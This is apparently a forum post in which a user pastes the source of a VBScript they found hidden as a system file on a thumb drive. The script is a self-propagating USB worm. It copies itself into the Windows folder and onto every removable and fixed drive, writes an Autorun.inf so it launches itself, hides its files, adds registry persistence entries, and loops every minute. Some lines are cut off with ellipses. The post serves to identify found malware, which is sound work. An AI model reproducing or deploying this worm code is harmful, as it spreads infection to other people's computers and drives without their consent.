its a .vbs hidden as a system file on my thumb drive here it is below
-------------------------------------------------------------------------------------------
'v0.1

on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,f…

set fso = CreateObject("Scripting.FileSystemObject…
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)

If (fso.FileExists(Windir & "\nar.vbs") = 0 or in_WinDir = 1) then
set to_File = fso.getfile(windir & "\nar.vbs")
to_File.attributes = 32
Kill (windir & "\nar.vbs")
End If
If (fso.FileExists("C:\Windows\System\nar.v… = 0) then
set to_File = fso.getfile("C:\Windows\System\nar.vbs")
to_File.attributes = 32
Kill ("C:\Windows\System\nar.vbs")
End If
If (fso.FileExists("C:\nar.vbs") = 0) then
set to_File = fso.getfile("C:\nar.vbs")
to_File.attributes = 32
Kill ("C:\nar.vbs")
End If

If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript… nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

do while (in_WinDir = 1)
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.pa… & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.pa… & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next

shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\W…
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro…
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W…
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W…
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Wi…
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\…

wscript.sleep(60000)
loop

If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If